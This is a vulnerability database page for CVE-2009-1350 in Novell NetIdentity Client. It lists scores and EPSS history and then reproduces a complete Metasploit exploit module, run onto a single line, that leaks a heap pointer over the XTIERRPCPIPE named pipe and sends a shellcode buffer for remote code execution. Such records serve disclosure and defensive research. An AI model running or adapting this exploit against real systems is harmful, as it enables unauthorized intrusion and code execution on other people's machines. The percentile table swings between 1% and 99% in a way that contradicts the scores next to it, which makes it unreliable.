CVE-2009-1350

OWSAP

A03-Injection

EPSS

76.55%V4

Vector

Network

Published

2009-04-21
14h00 +00:00

Modified

2018-10-10
16h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Unspecified vulnerability in xtagent.exe in Novell NetIdentity Client before 1.2.4 allows remote attackers to execute arbitrary code by establishing an IPC$ connection to the XTIERRPCPIPE named pipe, and sending RPC messages that trigger a dereference of an arbitrary pointer.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-20	Improper Input Validation The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	10		AV:N/AC:L/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	84.13%	–	–
2022-07-17	–	–	81.53%	–	–
2022-07-24	–	–	84.13%	–	–
2023-03-12	–	–	–	96.98%	–
2023-06-11	–	–	–	96.72%	–
2023-07-30	–	–	–	96.52%	–
2023-09-10	–	–	–	96.63%	–
2023-10-22	–	–	–	96.71%	–
2023-12-03	–	–	–	96.7%	–
2024-01-14	–	–	–	96.44%	–
2024-02-11	–	–	–	96.44%	–
2024-02-25	–	–	–	96.4%	–
2024-06-02	–	–	–	96.4%	–
2024-06-16	–	–	–	96.52%	–
2024-07-21	–	–	–	96.39%	–
2024-08-25	–	–	–	96.3%	–
2024-09-29	–	–	–	96.4%	–
2024-11-03	–	–	–	96.25%	–
2024-12-08	–	–	–	96.22%	–
2024-12-22	–	–	–	96.15%	–
2025-01-12	–	–	–	95.29%	–
2025-01-19	–	–	–	95.29%	–
2025-03-18	–	–	–	–	73.91%
2025-03-30	–	–	–	–	76.55%
2025-03-30	–	–	–	–	76.55,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	1%
2022-07-17	1%
2022-07-24	1%
2023-03-12	1%
2023-06-11	99%
2023-07-30	99%
2023-09-10	99%
2023-10-22	1%
2023-12-03	1%
2024-01-14	99%
2024-02-11	1%
2024-02-25	1%
2024-06-02	1%
2024-06-16	1%
2024-07-21	1%
2024-08-25	1%
2024-09-29	1%
2024-11-03	1%
2024-12-08	1%
2024-12-22	1%
2025-01-12	1%
2025-01-19	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

Exploit information

Exploit Database EDB-ID : 16376

Publication date : 2010-11-23 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: netidentity_xtierrpcpipe.rb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted. }, 'Author' => [ 'MC', 'Ruben Santamarta' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11127 $', 'References' => [ [ 'CVE', '2009-1350' ], [ 'OSVDB', '53351' ], [ 'BID', '34400' ], [ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', # only one shot! }, 'Payload' => { 'Space' => 550, 'BadChars' => "\x00\x09\x0c\x0b\x20\x0a\x0d\x5c\x5f\x2f\x2e\x40", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xe4\xf0\xff\xff\xff", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 / Windows XP / Windows 2003', { 'Ret' => 0x41414141 } ], ], 'Privileged' => true, 'DisclosureDate' => 'Apr 6 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']), OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit']) ], self.class ) end def mem_leak print_status("Connecting to the server...") connect() print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") begin smb_login() rescue ::Exception => e print_error("Error: #{e}") disconnect return end print_status("Connecting to named pipe \\XTIERRPCPIPE...") # If the pipe doesn't exist, bail. begin pipe = simple.create_pipe('\\XTIERRPCPIPE') rescue ::Exception => e print_error("Error: #{e}") disconnect return end # If we get this far, do the dance. fid = pipe.file_id # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '') # Send the first request to get our pointer. leak = [0x00000004].pack('V') + [0x00000818].pack('V') leak << rand_text_alpha_upper(2040) print_status("Sending malformed request...") pipe.write(leak) heap_pointer_leaked = pipe.read()[2060,4].unpack('V')[0] print_status(sprintf("Heap Pointer leaked: 0x%.8x", heap_pointer_leaked)) print_status("Building fake VTable...") object = heap_pointer_leaked + 0x700 print_status(sprintf("Object: 0x%.8x", object)) method = object + 0x30 print_status(sprintf("Method: 0x%.8x", method)) shellcode = method + 0xA0 print_status(sprintf("Shellcode: 0x%.8x", shellcode)) pipe.close return heap_pointer_leaked,object,method,shellcode end def exploit heap_pointer_leaked,object,method,shellcode = mem_leak() return if not shellcode sploit = [0x00000002].pack('V') sploit << [0x00000000].pack('V') sploit << [object].pack('V') sploit << [0x00000000].pack('V') sploit << rand_text_alpha_upper(240) sploit << [object].pack('V') * 32 sploit << [method].pack('V') * 32 sploit << [shellcode].pack('V') * 32 sploit << make_nops(748) sploit << payload.encoded sploit << rand_text_alpha_upper(110) print_status("Connecting to the server...") connect() print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") begin smb_login() rescue ::Exception => e print_error("Error: #{e}") disconnect return end print_status("Connecting to named pipe \\XTIERRPCPIPE...") # If the pipe doesn't exist, bail. begin pipe = simple.create_pipe('\\XTIERRPCPIPE') rescue ::Exception => e print_error("Error: #{e}") disconnect return end # ok, set up and send our exploit buffer... fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '') print_status("#{sploit.length} bytes written...") pipe.write(sploit) handler disconnect end end